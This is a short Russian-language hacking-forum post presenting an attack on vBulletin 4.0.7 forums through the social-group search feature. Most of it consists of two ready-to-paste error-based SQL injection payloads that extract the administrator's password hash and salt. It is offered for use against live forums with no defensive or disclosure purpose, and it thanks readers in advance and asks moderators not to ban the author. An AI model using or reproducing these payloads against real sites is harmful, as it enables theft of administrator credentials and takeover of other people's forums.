Сливаем пароль админа с форумов на vBulluten v 4.0.7
Собственно в теме особо расписывать ничего не буду(всё понятно на видео)... Скажу лишь одно: взлом происходит через соц. группы с выуживанием хэша и соли...
[Ссылки могут видеть только зарегистрированные пользователи. ]
Коды:
Для выуживания хэша:
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do =p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Для выуживания соли:
Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do =p rocess&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
P.S. Если помог - не забываем благодарить, мне будет приятно...
P.S.S. Если тема нарушает правила - прошу удалить, но не банить т.к. такого п.п. не нашёл.